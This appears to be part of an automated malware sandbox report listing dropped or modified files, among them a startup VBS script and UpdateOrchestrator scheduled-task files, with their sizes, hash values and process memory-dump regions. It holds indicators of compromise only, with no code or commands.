SHA512ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
-
C:\Users\Admin\AppData\Roaming\startup_str_824.vbsFilesize
115B
MD53ffd611ef2d18d243ac564e0f7d62821
SHA1dc263be524db27643cd508db6324a6fa84894ac7
SHA256b3675ddb7a8616d21671bc2e69dac84890c104c802ba9132a89e0a523a8f1fae
SHA5129ea8f1655bc51637279d62b86c0b863d233eb187a28fd1130736fe769327bbb51645046385c7fdc850954b5497f25e1794e947be2fc30464fb8307d579f60dce
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/380-163-0x00000264BB540000-0x00000264BB56B000-memory.dmpFilesize
172KB
-
memory/380-169-0x00000264BB540000-0x00000264BB56B000-memory.dmpFilesize
172KB
-
memory/380-170-0x00007FFAC7A70000-0x00007FFAC7A80000-memory.dmpFilesize
64KB
-
memory/424-174-0x0000025AF3BB0000-0x0000025AF3BDB000-memory.dmpFilesize
172KB
-
memory/612-137-0x00007FFAC7A70000-0x00007FFAC7A80000-memory.dmpFilesize
64KB
-
memory/612-129-0x000002258A0C0000-0x000002258A0EB000-memory.dmpFilesize
172KB
-
memory/612-136-0x000002258A0C0000-0x000002258A0EB000-memory.dmpFilesize
172KB
-
memory/612-128-0x000002258A090000-0x000002258A0B5000-memory.dmpFilesize
148KB
-
memory/612-130-0x000002258A0C0000-0x000002258A0EB000-memory.dmpFilesize
172KB
-
memory/668-148-0x00007FFAC7A70000-0x00007FFAC7A80000-memory.dmpFilesize
64KB
-
memory/668-141-0x000001CC091D0000-0x000001CC091FB000-memory.dmpFilesize
172KB
-
memory/668-147-0x000001CC091D0000-0x000001CC091FB000-memory.dmpFilesize
172KB
-
memory/956-152-0x000001943E5D0000-0x000001943E5FB000-memory.dmpFilesize
172KB
-
memory/956-158-0x000001943E5D0000-0x000001943E5FB000-memory.dmpFilesize
172KB
-
memory/956-159-0x00007FFAC7A70000-0x00007FFAC7A80000-memory.dmpFilesize
64KB
-
memory/1032-101-0x00000000076D0000-0x0000000007746000-memory.dmpFilesize
472KB
-
memory/1032-95-0x0000000006B00000-0x0000000006B44000-memory.dmpFilesize
272KB
-
memory/1556-121-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmpFilesize
2.0MB
-
memory/1556-115-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1556-118-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1556-117-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1556-116-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1556-123-0x00007FFB063B0000-0x00007FFB0646E000-memory.dmpFilesize
760KB
-
memory/1556-120-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1556-125-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2148-114-0x00007FFB063B0000-0x00007FFB0646E000-memory.dmpFilesize
760KB
-
memory/2148-112-0x0000027D6CDC0000-0x0000027D6CDEA000-memory.dmpFilesize
168KB
-
memory/2148-113-0x00007FFB079F0000-0x00007FFB07BE5000-memory.dmpFilesize
2.0MB
-
memory/2148-102-0x0000027D6A8C0000-0x0000027D6A8E2000-memory.dmpFilesize
136KB
-
memory/3652-37-0x0000000007470000-0x00000000074A2000-memory.dmpFilesize
200KB
-
memory/3652-36-0x0000000075170000-0x0000000075920000-memory.dmpFilesize
7.7MB
-
memory/3652-25-0x0000000075170000-0x0000000075920000-memory.dmpFilesize
7.7MB
-
memory/3652-35-0x0000000075170000-0x0000000075920000-memory.dmpFilesize
7.7MB
-
memory/3652-39-0x0000000070F90000-0x0000000070FDC000-memory.dmpFilesize
304KB
-
memory/3652-38-0x0000000075170000-0x0000000075920000-memory.dmpFilesize
7.7MB
-
memory/3652-58-0x0000000075170000-0x0000000075920000-memory.dmpFilesize
7.7MB
-
memory/3652-55-0x0000000075170000-0x0000000075920000-memory.dmpFilesize
7.7MB
-
memory/3652-54-0x0000000007800000-0x0000000007811000-memory.dmpFilesize
68KB
-
memory/3652-53-0x0000000007880000-0x0000000007916000-memory.dmpFilesize
600KB
-
memory/3652-52-0x0000000007670000-0x000000000767A000-memory.dmpFilesize
40KB
-
memory/3652-51-0x0000000075170000-0x0000000075920000-memory.dmpFilesize
7.7MB
-
memory/3652-50-0x00000000074B0000-0x0000000007553000-memory.dmpFilesize
652KB
-
memory/3652-49-0x0000000006880000-0x000000000689E000-memory.dmpFilesize
120KB
-
memory/3664-5-0x0000000005F20000-0x0000000005F86000-memory.dmpFilesize
408KB
-
memory/3664-16-0x0000000006000000-0x0000000006354000-memory.dmpFilesize
3.3MB
-
memory/3664-0-0x000000007517E000-0x000000007517F000-memory.dmpFilesize
4KB
-
memory/3664-21-0x0000000002EE0000-0x0000000002EE8000-memory.dmpFilesize
32KB
-
memory/3664-2-0x0000000075170000-0x0000000075920000-memory.dmpFilesize
7.7MB
-
memory/3664-20-0x0000000006AB0000-0x0000000006ACA000-memory.dmpFilesize
104KB
-
memory/3664-23-0x0000000009960000-0x0000000009F04000-memory.dmpFilesize
5.6MB
-
memory/3664-19-0x0000000007D30000-0x00000000083AA000-memory.dmpFilesize
6.5MB
-
memory/3664-1-0x0000000002FE0000-0x0000000003016000-memory.dmpFilesize
216KB
-
memory/3664-3-0x0000000005880000-0x0000000005EA8000-memory.dmpFilesize
6.2MB
-
memory/3664-22-0x0000000007730000-0x0000000007792000-memory.dmpFilesize
392KB
-
memory/3664-18-0x0000000006520000-0x000000000656C000-memory.dmpFilesize
304KB
-
memory/3664-17-0x00000000064D0000-0x00000000064EE000-memory.dmpFilesize
120KB
-
memory/3664-4-0x0000000005750000-0x0000000005772000-memory.dmpFilesize
136KB
-
memory/3664-6-0x0000000005F90000-0x0000000005FF6000-memory.dmpFilesize
408KB
-
memory/3664-77-0x0000000075170000-0x0000000075920000-memory.dmpFilesize
7.7MB
-
memory/3988-78-0x00000000076C0000-0x000000000772C000-memory.dmpFilesize
432KB
-
memory/3988-80-0x0000000005140000-0x0000000005152000-memory.dmpFilesize
72KB
-
memory/3988-79-0x00000000077E0000-0x0000000007872000-memory.dmpFilesize
584KB
-
memory/3988-81-0x0000000007A80000-0x0000000007ABC000-memory.dmpFilesize
240KB